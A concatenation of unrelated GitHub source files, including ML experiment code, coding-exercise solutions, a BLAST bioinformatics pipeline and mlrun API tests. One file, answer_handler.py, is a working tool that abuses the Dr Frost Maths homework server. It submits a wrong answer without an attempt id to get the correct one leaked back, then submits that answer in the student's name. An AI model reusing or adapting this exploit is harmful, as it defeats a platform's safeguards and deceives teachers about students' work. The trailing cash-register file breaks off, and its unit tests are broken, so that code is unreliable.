mlrun.api.utils.singletons.k8s\n\n\n@pytest.fixture\ndef kfp_client_mock(monkeypatch) -> kfp.Client:\n mlrun.api.utils.singletons.k8s.get_k8s().is_running_inside_kubernetes_cluster = unittest.mock.Mock(\n return_value=True\n )\n kfp_client_mock = unittest.mock.Mock()\n monkeypatch.setattr(kfp, \"Client\", lambda *args, **kwargs: kfp_client_mock)\n return kfp_client_mock\n\n\ndef test_list_pipelines_not_exploding_on_no_k8s(\n db: sqlalchemy.orm.Session, client: fastapi.testclient.TestClient\n) -> None:\n response = client.get(\"/api/projects/*/pipelines\")\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=[], total_size=0, next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_empty_list(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = []\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\"/api/projects/*/pipelines\")\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_names_only(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = _generate_run_mocks()\n expected_runs = [run.name for run in runs]\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\n \"/api/projects/*/pipelines\",\n params={\"format\": mlrun.api.schemas.Format.name_only},\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_metadata_only(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = _generate_run_mocks()\n expected_runs = [run.to_dict() for run in runs]\n expected_runs = mlrun.api.crud.pipelines._format_runs(\n expected_runs, mlrun.api.schemas.Format.metadata_only\n )\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\n \"/api/projects/*/pipelines\",\n params={\"format\": mlrun.api.schemas.Format.metadata_only},\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_full(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = _generate_run_mocks()\n expected_runs = [run.to_dict() for run in runs]\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\n \"/api/projects/*/pipelines\", params={\"format\": mlrun.api.schemas.Format.full}\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_specific_project(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n project = \"project-name\"\n runs = _generate_run_mocks()\n expected_runs = [run.name for run in runs]\n _mock_list_runs_with_one_run_per_page(kfp_client_mock, runs)\n mlrun.api.crud.pipelines._resolve_pipeline_project = unittest.mock.Mock(\n return_value=project\n )\n response = client.get(\n f\"/api/projects/{project}/pipelines\",\n params={\"format\": mlrun.api.schemas.Format.name_only},\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(expected_runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n # revert mock setting (it's global function, without reloading it the mock will persist to following tests)\n importlib.reload(mlrun.api.crud.pipelines)\n\n\ndef _generate_run_mocks():\n return [\n kfp_server_api.models.api_run.ApiRun(\n id=\"id1\",\n name=\"run1\",\n description=\"desc1\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id1\"\n ),\n ),\n kfp_server_api.models.api_run.ApiRun(\n id=\"id2\",\n name=\"run2\",\n description=\"desc2\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id2\"\n ),\n ),\n kfp_server_api.models.api_run.ApiRun(\n id=\"id3\",\n name=\"run3\",\n description=\"desc3\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id3\"\n ),\n ),\n kfp_server_api.models.api_run.ApiRun(\n id=\"id4\",\n name=\"run4\",\n description=\"desc4\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id4\"\n ),\n ),\n ]\n\n\ndef _mock_list_runs_with_one_run_per_page(kfp_client_mock: kfp.Client, runs):\n expected_page_tokens = [\"\"]\n for i in range(2, len(runs) + 1):\n expected_page_tokens.append(i)\n expected_page_tokens.append(None)\n\n def list_runs_mock(*args, page_token=None, page_size=None, **kwargs):\n assert expected_page_tokens.pop(0) == page_token\n assert mlrun.api.schemas.PipelinesPagination.max_page_size == page_size\n return kfp_server_api.models.api_list_runs_response.ApiListRunsResponse(\n [runs.pop(0)], 1, next_page_token=expected_page_tokens[0]\n )\n\n kfp_client_mock._run_api.list_runs = list_runs_mock\n\n\ndef _mock_list_runs(\n kfp_client_mock: kfp.Client,\n runs,\n expected_page_token=\"\",\n expected_page_size=mlrun.api.schemas.PipelinesPagination.default_page_size,\n expected_sort_by=\"\",\n expected_filter=\"\",\n):\n def list_runs_mock(\n *args, page_token=None, page_size=None, sort_by=None, filter=None, **kwargs\n ):\n assert expected_page_token == page_token\n assert expected_page_size == page_size\n assert expected_sort_by == sort_by\n assert expected_filter == filter\n return kfp_server_api.models.api_list_runs_response.ApiListRunsResponse(\n runs, len(runs)\n )\n\n kfp_client_mock._run_api.list_runs = list_runs_mock\n\n\ndef _assert_list_pipelines_response(\n expected_response: mlrun.api.schemas.PipelinesOutput, response\n):\n assert response.status_code == http.HTTPStatus.OK.value\n assert (\n deepdiff.DeepDiff(expected_response.dict(), response.json(), ignore_order=True,)\n == {}\n )\n","repo_name":"Sharon-iguazio/mlrun","sub_path":"tests/api/api/test_pipelines.py","file_name":"test_pipelines.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"24125841672","text":"# 자연수 n을 입력하고, 자연수 n의 약수들의 총 합을 구하시오\n\nn = int(input('숫자입력: '))\n\ndef solution(n):\n answer = 0\n for i in range(1, n + 1):\n if n % i == 0:\n answer += i\n return answer\n\nprint(solution(n))","repo_name":"soohyun-lee/python3","sub_path":"python3.5.py","file_name":"python3.5.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15996847126","text":"import os\nfrom urllib.parse import urlparse\n\nimport torch\nfrom torch import Tensor\nfrom torch.optim import Optimizer\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import LearningRateMonitor\n\nfrom hydra.utils import instantiate\nfrom omegaconf import DictConfig\nimport numpy as np\n\nfrom src.data_module import DataModule\nfrom src.setup import setup_model\n\n\nclass Experiment(pl.LightningModule):\n def __init__(self, config, ):\n super(Experiment, self).__init__()\n self.config: DictConfig = config\n logger = instantiate(config.logger)\n self.trainer = instantiate(\n config.trainer,\n logger=logger,\n callbacks=[\n LearningRateMonitor(logging_interval=\"step\"),\n ],\n )\n\n self.model = setup_model(config)\n\n self.data_module = DataModule(\n config.batch_size, config.coordinates_path, config.forces_path,\n config.train_test_rate, config.dataset)\n\n self.loss_func = torch.nn.L1Loss(reduction=\"mean\")\n\n print(self.model)\n\n self.val_loss = 1e-20\n self.best_model_state_dict = self.model.state_dict()\n\n self.tensor_dtype = torch.float32 if config.trainer.precision == 32 else torch.float16\n\n self.warm_up = config.warm_up\n\n def save(self):\n artifact_path = urlparse(self.logger._tracking_uri).path\n self.artifact_path = os.path.join(\n artifact_path, self.logger.experiment_id, self.logger.run_id, \"artifacts\")\n torch.save(self.best_model_state_dict, self.artifact_path + \"/model.pth\")\n\n def configure_optimizers(self):\n params = self.model.parameters()\n optimizer: Optimizer = instantiate(\n self.config.optimizer, params=params)\n scheduler = instantiate(self.config.scheduler, optimizer=optimizer)\n return [optimizer], [scheduler]\n\n def cal_nn(self, x):\n is_use_NN = self.current_epoch >= self.warm_up\n return self.model(x, is_use_NN)\n\n @torch.enable_grad()\n def training_step(self, batch, batch_idx):\n x, y = batch\n x = x.requires_grad_(True)\n y = y.requires_grad_(True)\n out, _ = self.cal_nn(x)\n loss = self.loss_func(out, y)\n return loss\n\n def training_epoch_end(self, loss):\n loss = np.array([float(item[\"loss\"].detach().cpu()) for item in loss])\n loss_avg = loss.mean()\n self.log(\"train_loss\", loss_avg)\n\n @torch.enable_grad()\n def validation_step(self, batch: Tensor, batch_idx: int):\n x, y = batch\n x = x.requires_grad_(True)\n y = y.requires_grad_(True)\n out, _ = self.cal_nn(x)\n loss = self.loss_func(out, y)\n return loss\n\n def validation_epoch_end(self, loss):\n loss = np.array([float(i.detach().cpu()) for i in loss])\n loss_avg = loss.mean()\n\n if loss_avg <= self.val_loss:\n self.val_loss = loss_avg\n self.best_model_state_dict = self.model.state_dict()\n self.log(\"validation_loss\", loss_avg)\n\n @torch.enable_grad()\n def test_step(self, batch: Tensor, batch_idx: int):\n x, y = batch\n x = x.requires_grad_(True)\n y = y.requires_grad_(True)\n out, _ = self.model(x)\n loss = self.loss_func(out, y)\n return loss\n\n def test_epoch_end(self, loss):\n loss = np.array([float(i.detach().cpu()) for i in loss])\n loss_avg = loss.mean()\n\n self.log(\"test_loss\", loss_avg)\n\n # train your model\n def fit(self):\n self.trainer.fit(self, self.data_module)\n self.logger.log_hyperparams(\n {\n \"batch_size\": self.config.batch_size,\n \"lr\": self.config.lr,\n }\n )\n self.log_artifact(\".hydra/config.yaml\")\n self.log_artifact(\".hydra/hydra.yaml\")\n self.log_artifact(\".hydra/overrides.yaml\")\n self.log_artifact(\"main.log\")\n\n # run your whole experiments\n def run(self):\n self.fit()\n self.trainer.test()\n # self.save()\n\n def log_artifact(self, artifact_path: str):\n self.logger.experiment.log_artifact(self.logger.run_id, artifact_path)\n","repo_name":"bokutotu/MdWithPrior","sub_path":"src/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14925398763","text":"\"\"\"\nIn a file called pizza.py, implement a program that expects exactly one command-line argument, the name (or path) of a CSV file in\nPinocchio’s format, and outputs a table formatted as ASCII art using tabulate, a package on PyPI at pypi.org/project/tabulate.\nFormat the table using the library’s grid format. If the user does not specify exactly one command-line argument, or if the specified\nfile’s name does not end in .csv, or if the specified file does not exist, the program should instead exit via sys.exit.\n\n+------------------+---------+---------+\n| Sicilian Pizza | Small | Large |\n+==================+=========+=========+\n| Cheese | $25.50 | $39.95 |\n+------------------+---------+---------+\n| 1 item | $27.50 | $41.95 |\n+------------------+---------+---------+\n| 2 items | $29.50 | $43.95 |\n+------------------+---------+---------+\n| 3 items | $31.50 | $45.95 |\n+------------------+---------+---------+\n| Special | $33.50 | $47.95 |\n+------------------+---------+---------+\n\n\"\"\"\n\n\nfrom tabulate import tabulate\nimport sys\n\n\ndef pizza():\n table = []\n\n if len(sys.argv) == 1:\n sys.exit(\"Too few command-line arguments\")\n elif len(sys.argv) >= 3:\n sys.exit(\"Too many command-line arguments\")\n elif sys.argv[1].split(\".\")[-1] != \"csv\":\n sys.exit(\"Not a CSV file\")\n else:\n try:\n with open(sys.argv[1], \"r\") as file:\n for line in file:\n header = line.rstrip().split(\",\")\n break\n for line in file.readlines()[0:]:\n justtable = line.rstrip().split(\",\")\n table.append(justtable)\n\n print(tabulate(table, header, tablefmt = \"grid\"))\n\n except FileNotFoundError:\n sys.exit(\"File not found\")\n\n\npizza()\n","repo_name":"Navfalbek/CS50P","sub_path":"week-6/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"16562723751","text":"import sys\nimport os\n\nsys.path.insert(0, \"/\".join(os.getcwd().split(\"/\")[:-2]))\nfrom judge import judge\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n\ndef DFS(s, e):\n global n, apt, cnt\n cnt += 1\n apt[s][e] = 0\n for i in range(4):\n x = s + dx[i]\n y = e + dy[i]\n if 0 <= x < n and 0 <= y < n and apt[x][y]:\n DFS(x, y)\n\n\n@judge()\ndef solve():\n global n, apt, cnt\n n = int(input())\n apt = [list(map(int, input())) for _ in range(n)]\n res = []\n for i in range(n):\n for j in range(n):\n if apt[i][j]:\n cnt = 0\n DFS(i, j)\n res.append(cnt)\n res.sort()\n res.insert(0, len(res))\n return \"\".join(map(str, res))\n\n\nsolve()\n","repo_name":"raymondanythings/algorithm_python","sub_path":"섹션 7/12. 단지번호붙이기/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15834785385","text":"import functools\nimport json\nimport sys\nfrom statistics import mean\n\nfrom parser_utils import Parser, NoQuestionFound, AAID_REGEX, FIND_DIGIT_REGEX\n\n\nclass InvalidURLException(BaseException):\n def __init__(self, url, *args):\n self.__url = url\n super().__init__(*args)\n\n def __str__(self):\n return f\"Invalid URL {self.__url}\"\n\n\ndef catch(func):\n @functools.wraps(func)\n def stub(self, *args, **kwargs):\n try:\n return func(self, *args, *kwargs)\n except NoQuestionFound: # raised in parser, questions finished\n return True, True\n except KeyboardInterrupt:\n sys.exit() # quits script\n except BaseException as e:\n return None, e\n\n return stub\n\n\nclass AnswerHandler:\n \"\"\"\n handles all the answer logic\n \"\"\"\n\n def __init__(self, session):\n self.sesh = session\n self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'\n ' Chrome/71.0.3578.98 Safari/537.36'}\n self.process_ans_url = 'https://www.drfrostmaths.com/homework/process-answer.php'\n self.answer_functions = {'expression': self.answer_expression,\n 'numeric': self.answer_numeric,\n 'eqnsolutions': self.answer_eqnsolutions,\n 'coordinate': self.answer_coordinate,\n 'multiplechoice': self.answer_multiplechoice,\n 'textual': self.answer_textual,\n 'fraction': self.answer_fraction,\n 'vector': self.answer_vector,\n 'table': self.answer_table,\n 'shape': self.answer_shape,\n 'list': self.answer_list,\n 'standardform': self.answer_standardform}\n\n @catch\n def answer_questions(self, url: str):\n \"\"\"\n main loop answers questions util an error is raised\n due to no more questions, invalid input or connection errors.\n\n Decorator handles returns.\n\n Answer process:\n\n - Post deliberately wrong answer without aaid i.e. {'qid': 1228, 'qnum': 1, 'expression-answer-1': 1}.\n - Sever sends correct answer without registering an attempt as no aaid was associated with the request.\n - Parse response for answer, use appropriate function.\n - Send answer with aaid i.e. {'qid': 1228, 'qnum': 1, 'expression-answer-1': \"parsed answer\", aaid: 12848}.\n - question answered!\n\n repeat.\n \"\"\"\n\n try:\n aaid = FIND_DIGIT_REGEX.findall(AAID_REGEX.findall(url)[0])[0]\n except IndexError:\n raise InvalidURLException(url)\n\n while True: # main loop\n # remove &qnum=NUMBER in case already appended\n page = self.sesh.get(\"\".join(url.split(\"&qnum=\")[:1]), headers=self.headers).text # get question page\n data, type_ = Parser.parse(page) # parse question data\n answer = self.find_answer(data, type_) # retrieve answer to question\n data['aaid'] = aaid\n try:\n result = self.answer_functions[type_](data, answer) # select appropriate function to process answer\n except KeyError:\n self.new_type(answer, type_) # not implemented type\n continue # skips auto submit\n\n self.submit(result)\n\n def find_answer(self, data: dict, type_: str):\n \"\"\"\n Attempts to find the correct answer to the current question.\n\n :param data: request payload\n :param type_: answer type\n :return: correct answer string\n \"\"\"\n data = dict(data)\n data[f'{type_}-answer-1'] = '1' # prepare incorrect answer\n print(f'Question number: {data[\"qnum\"]}', '|', f'Question type: {type_}')\n r = self.sesh.post(self.process_ans_url, data=data, headers=self.headers) # submit incorrect answer\n _json = json.loads(r.text)\n return _json['answer'] # parse correct answer\n\n def submit(self, data: dict):\n # noinspection PyBroadException\n try:\n r = self.sesh.post(self.process_ans_url, data=data, timeout=3)\n except BaseException:\n return False\n\n _json = json.loads(r.text)\n if not _json['isCorrect']:\n self.wrong_answer(_json, data)\n return False\n return True\n\n @staticmethod\n def new_type(answer: dict, type_: str):\n print(f'No system in place to auto submit this answer type ({type_}) yet you will have to type it in manually:'\n f'\\n {answer}')\n input('Press enter to proceed: ')\n\n @staticmethod\n def wrong_answer(response, data: dict):\n print('-- The wrong answer was submitted --')\n print('The following data if for debugging:')\n print(f'Request: {data}')\n print(f'Response: {response}')\n\n # answer specific functions --:\n\n @staticmethod\n def answer_expression(data, answer):\n answer = [answer['main']]\n data['expression-answer'] = answer\n return data\n\n @staticmethod\n def answer_numeric(data, answer):\n for index, item in enumerate(answer):\n if item['exact']:\n data[f'numeric-answer-{index + 1}'] = item['exact']\n else:\n # find mid value\n data[f'numeric-answer-{index + 1}'] = mean([float(item[\"to\"]), float(item[\"from\"])])\n return data\n\n @staticmethod\n def answer_eqnsolutions(data, answer):\n data['eqnsolutions-answer'] = str(answer).replace(\"'\", '\"').replace(' ', '')\n return data\n\n @staticmethod\n def answer_coordinate(data, answer):\n data['expression-answer-x'] = answer['x']\n data['expression-answer-y'] = answer['y']\n return data\n\n @staticmethod\n def answer_multiplechoice(data, answer):\n data['multiplechoice-answer[]'] = answer\n return data\n\n @staticmethod\n def answer_textual(data, answer):\n for index, item in enumerate(answer):\n data[f'textual-answer-{index + 1}'] = item\n return data\n\n @staticmethod\n def answer_fraction(data, answer):\n data['fraction-numer'] = answer['numer']\n data['fraction-denom'] = answer['denom']\n return data\n\n @staticmethod\n def answer_vector(data, answer):\n data['expression-answer-vector'] = str(answer).replace(\"'\", '\"')\n return data\n\n @staticmethod\n def answer_table(data, answer):\n for z, i in enumerate(answer):\n for p, x in enumerate(i):\n if x:\n data[f'table-answer-{z + 1}-{p + 1}'] = x\n data['expression-answer-table'] = str(answer).replace(\"'\", '\"')\n return data\n\n @staticmethod\n def answer_shape(data, answer):\n data['shape-answer'] = str(answer).replace(\"'\", '\"').replace(' ', '')\n return data\n\n @staticmethod\n def answer_list(data, answer):\n ans = ','.join(answer)\n data['list-answer'] = ans\n return data\n\n @staticmethod\n def answer_standardform(data, answer):\n data['expression-answer-main'] = answer['main']\n data['expression-answer-power'] = answer['power']\n return data\n","repo_name":"Asad-K/DFM-Answer-Tool","sub_path":"answer_handler.py","file_name":"answer_handler.py","file_ext":"py","file_size_in_byte":7413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"72246001081","text":"__version__ = \"1.3\"\n\n\n# =======================================================================================\n# IMPORTS\n# =======================================================================================\n\nimport os\nimport sys\nimport glob\nfrom multiprocessing import Manager\nimport shelve\n\nimport aligera_scripts.primary_scripts as primaryScript\nfrom aligera_scripts.utilities import (\n check_for_file,\n create_result_folder,\n is_fasta,\n process_future_fasta,\n)\n\n# =======================================================================================\n# FUNCTIONS\n# =======================================================================================\n\n\ndef runMakeblastdb(cfg, logger, cpu_number):\n logger.info(\"Running blastdb\")\n in_folder = cfg[\"input_folder\"]\n in_suffix = cfg[\"input_suffix\"]\n blastn_db_folder = cfg[\"blastn_databases_folder\"]\n create_result_folder(blastn_db_folder, logger)\n os.chdir(in_folder)\n finished_files = [x.split(\".nin\")[0] for x in os.listdir(blastn_db_folder)]\n starting_files = sorted(\n [\n x\n for x in os.listdir(os.getcwd())\n if in_suffix in x and x.split(in_suffix)[0] not in finished_files\n ]\n )\n if cfg[\"fasta_sanity_check\"]:\n for fasta in starting_files:\n is_fasta(fasta)\n logger.info(\"There are {} input fasta files\".format(len(starting_files)))\n if starting_files:\n manager = Manager()\n fastas = manager.Queue()\n result_dict = manager.dict()\n process_future_fasta(\n primaryScript.run_makeblastdb,\n starting_files,\n result_dict,\n fastas,\n cpu_number,\n logger,\n cfg,\n tqdm_desc=\"Running blastdb\",\n )\n\n logger.info(\"run_makeblastdb finished\")\n\n\ndef runBLAST(cfg, logger, cpu_number):\n logger.info(\"Running BLAST\")\n in_folder = cfg[\"input_folder\"]\n blastn_dbs = cfg[\"blastn_databases_folder\"]\n in_suffix = cfg[\"input_suffix\"]\n out_folder = cfg[\"blastn_results_folder\"]\n create_result_folder(out_folder, logger)\n if not os.path.exists(blastn_dbs) or not os.listdir(blastn_dbs):\n exception = \"[error]: either blastdb folder {} is empty or \\\nit has not been created by running 'run_makeblastdb'\".format(\n blastn_dbs\n )\n raise Exception(exception)\n sys.exit()\n \n if not os.path.exists(in_folder) or not os.listdir(in_folder):\n exception = \"[error]: either fasta input folder {} is empty or \\\nit does not exist\".format(\n in_folder\n )\n raise Exception(exception)\n sys.exit()\n os.chdir(in_folder)\n starting_files = sorted([x for x in os.listdir(os.getcwd()) if in_suffix in x])\n\n if cfg[\"fasta_sanity_check\"]:\n for fasta in starting_files:\n primaryScript.is_fasta(fasta)\n\n logger.info(\"There are {} input fasta files\".format(len(starting_files)))\n fasta_to_db = primaryScript.fasta_to_blastdb(starting_files, cfg)\n\n logger.info(\"Starting BLAST...\")\n if fasta_to_db:\n manager = Manager()\n fastas = manager.Queue()\n result_dict = manager.dict()\n process_future_fasta(\n primaryScript.run_blastn,\n fasta_to_db,\n result_dict,\n fastas,\n cpu_number,\n logger,\n cfg,\n tqdm_desc=\"Running BLAST\",\n )\n\n logger.info(\"run_BLAST finished\")\n\n\ndef parseXMLs(cfg, logger, cpu_number, temporary_folder):\n logger.info(\"Parsing xmls\")\n\n in_folder = cfg[\"blastn_results_folder\"]\n if not os.path.exists(in_folder) or not [\n x for x in os.listdir(in_folder) if \".xml\" in x\n ]:\n exception = \"[error]: either blastn_results_folder {} is empty or \\\nit has not been created by running 'run_BLAST'\".format(\n in_folder\n )\n raise Exception(exception)\n sys.exit()\n os.chdir(in_folder)\n starting_files = sorted([x for x in os.listdir(os.getcwd()) if \".xml\" in x])\n\n logger.info(\"There are {} input xml files\".format(len(starting_files)))\n logger.debug(\"Parsing xml files\")\n if starting_files:\n manager = Manager()\n fastas = manager.Queue()\n result_dict = manager.dict()\n process_future_fasta(\n primaryScript.parse_pickle,\n starting_files,\n result_dict,\n fastas,\n cpu_number,\n logger,\n temporary_folder,\n min_align_length=cfg[\"min_align_len\"],\n tqdm_desc=\"Parsing xmls\",\n )\n os.chdir(temporary_folder)\n dat_files = [x for x in os.listdir(os.getcwd()) if \".dat\" in x]\n taxa_pairs = primaryScript.find_dat_pairs(dat_files)\n common_hits = shelve.open(\"common_hits_dict\")\n for pair in taxa_pairs:\n primaryScript.populate_shelve(common_hits, pair)\n common_hits.close()\n logger.info(\"Done parsing xmls\")\n\n\ndef componentsSequential(cfg, logger, temporary_folder):\n logger.info(\"Building components sequentially\")\n os.chdir(temporary_folder)\n check_for_file(\"common_hits_dict.dat\")\n primaryScript.getComponentsSequential(cfg, logger)\n # ===================================================================================\n for shl in glob.glob(\"common_hits_dict.*\"):\n os.remove(shl)\n # ===================================================================================\n logger.info(\"Done with computing components\")\n\n\ndef componentsParallel(cfg, logger, cpu_number, temporary_folder):\n logger.info(\"Building components in parallel\")\n os.chdir(temporary_folder)\n check_for_file(\"common_hits_dict.dat\")\n primaryScript.getComponentsParallel(cfg, logger, cpu_number)\n # ===================================================================================\n for shl in glob.glob(\"common_hits_dict.*\"):\n os.remove(shl)\n # ===================================================================================\n logger.info(\"Done with computing components\")\n\n\ndef makePrimaryAssortments(cfg, logger, temporary_folder):\n logger.info(\"Retrieving the primary sequence assortments\")\n out_folder = cfg[\"output_folder\"]\n create_result_folder(out_folder, logger)\n discard_aligns = cfg[\"discarded_groups_folder\"]\n create_result_folder(discard_aligns, logger)\n primaryScript.mk_primary(cfg, logger, temporary_folder)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"yjk-bertrand/AligerA","sub_path":"aligera_scripts/AligerA_primary.py","file_name":"AligerA_primary.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21692220098","text":"n = int(input())\n\n# n이하 소수 구하기\nprime = []\nsieve = [True]*(n+1)\nsieve[0] = sieve[1] = False\nfor i in range(2, int(n**0.5)+1):\n if not sieve[i]: continue\n for j in range(i*i, n+1, i):\n sieve[j] = False\nfor i in range(n+1):\n if sieve[i]:\n prime.append(i)\n\n# 투포인터로 연속합 구하기\nanswer = 0\nif n > 1:\n end = 0\n total = prime[0]\n for start in range(len(prime)):\n while end < len(prime) and total < n:\n end += 1\n if end != len(prime): total += prime[end]\n if end == len(prime): break\n if total == n: answer += 1\n total -= prime[start]\nprint(answer)","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/thing-zoo/12.투포인터/1644-소수의 연속합/1644.py","file_name":"1644.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5539345767","text":"\"\"\"program a cash register for a warehouse.\r\n The system must be able to scan a product (the cashier can type in the product code), \r\n and add it to the list of products purchased for that customer.\r\n It should also show the subtotal. The cashier can finish the purchase whenever\r\n he wishes and the system must apply the corresponding discounts to the products.\r\n Then, the cashier indicates how much the customer pays with and the system must \r\n show the change to be returned to the customer. do the models and \r\n tests of the functionalities. It is not necessary to make a graphical interface\r\n (or console), but the whole operation can be validated with the unit tests.\"\"\"\r\n\r\n#we will use class cashRegister from cash_register.py and class reatailtem from retail.py \r\n#main to test the program\r\n\r\nimport unittest\r\nclass CashRegister:\r\n# initialize an empty list to hold purchased items\r\n def __init__(self):\r\n self.__items = []\r\n# method that clears the contents of the cash register\r\n def clear(self):\r\n self.__items = []\r\n# method that simulates adding an item to the cash register.\r\n# receives a RetailItem object as an argument.\r\n def purchase_item(self, retail_item):\r\n self.__items.append(retail_item)\r\n print(\"The item was added to the cash register.\")\r\n# method returning the total cost of items at the cash register.\r\n def get_total(self):\r\n total = 0.0\r\n for item in self.__items:\r\n total = total + item.get_price()\r\n return total\r\n# method that prints a list of items at the cash register.\r\n def show_items(self):\r\n print(\"The items in the cash register are:\")\r\n print()\r\n for item in self.__items:\r\n print(item)\r\n print()\r\n\r\n#=============================================================== \r\n#******* TESTING CASH REGISTER *******\r\n#===============================================================\r\n\r\nclass Test(unittest.TestCase):\r\n #@unittest.skip(\"Reazon for skipping\")#Unconditionally skip the decorated test. reason should describe why the test is being skipped.\r\n \r\n #assertTrue compare test value with true\r\n #create a method to check if the parameter retail_item in empty\r\n def is_empty(retail_item):\r\n if(len(retail_item) == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n #assertTrue compare test value with true assert that two object are True\r\n def test_is_empty_empty_string_success(self):\r\n result = Test.is_empty(\"\")\r\n self.assertTrue(result, True)\r\n\r\n #assertFalse compare test value with false\r\n def test_is_empty_with_string_success(self):\r\n result = Test.is_empty(\"retail_item\")\r\n self.assertFalse(result, False)\r\n\r\n\r\nimport unittest\r\n#test cases are represented by unittest.TestCase instances.\r\nclass RetailItem:\r\n def __init__(self, description, inventory, price):\r\n self.__description = description\r\n self.__inventory = inventory\r\n self.__price = price\r\n \r\n def set_description(self, description):\r\n self.__description = description\r\n \r\n #inventary level\r\n def set_inventory(self, inventory):\r\n self.__inventory = inventory\r\n \r\n #put the price\r\n def set_price(self, price):\r\n self.__price = price\r\n \r\n #get the item description\r\n def get_description(self):\r\n return self.__description\r\n \r\n #check for inventary\r\n def get_inventory(self):\r\n return self.__inventory\r\n \r\n #get the item price\r\n def get_price(self):\r\n return self.__price\r\n \r\n def __str__(self):\r\n result = 'Description: ' + self.get_description() + '\\n' + \\\r\n 'Units in inventory: ' + str(self.get_inventory()) + \\\r\n '\\nPrice: $' + str(self.get_price())\r\n return result\r\n\r\n#=========================================================\r\n#*******TESTING RETAIL ITEMS ********\r\n#=========================================================\r\n\r\nclass Test(unittest.TestCase):\r\n #@unittest.skip(\"Reazon for skipping\")#Unconditionally skip the decorated test. reason should describe why the test is being skipped.\r\n \r\n \r\n#********description method********\r\n #assertTrue compare test value with true\r\n #create a method to check if the parameter description in empty\r\n def is_empty(description):\r\n if(len(description) == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n #assertTrue compare test value with true assert that two object are True\r\n def test_is_empty_empty_string_success(self):\r\n result = Test.is_empty(\"\")\r\n self.assertTrue(result, True)\r\n\r\n #assertFalse compare test value with false\r\n def test_is_empty_with_string_success(self):\r\n result = Test.is_empty(\"description\")\r\n self.assertFalse(result, False)\r\n\r\n\r\n#********inventary method********\r\n\r\n#assertTrue compare test value with true\r\n #create a method to check if the parameter description in empty\r\n def is_empty(inventory):\r\n if(len(inventory) == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n #assertTrue compare test value with true assert that two object are True\r\n def test_is_empty_empty_string_success(self):\r\n result = Test.is_empty(\"\")\r\n self.assertTrue(result, True)\r\n\r\n #assertFalse compare test value with false\r\n def test_is_empty_with_string_success(self):\r\n result = Test.is_empty(\"inventory\")\r\n self.assertFalse(result, False)\r\n\r\n#********price method********\r\n\r\n#write unittest to test the funcionality\r\n #assertEqual check for expected result\r\n def test_number_division_success(self):\r\n result = Test.price(19.99, (19.99 *.1))\r\n self.assertEqual(result, 1.9999) #1.9999 is the spected result\r\n\r\n#import retail and cash_register classes\r\n#==============================================\r\n#********MAIN TO 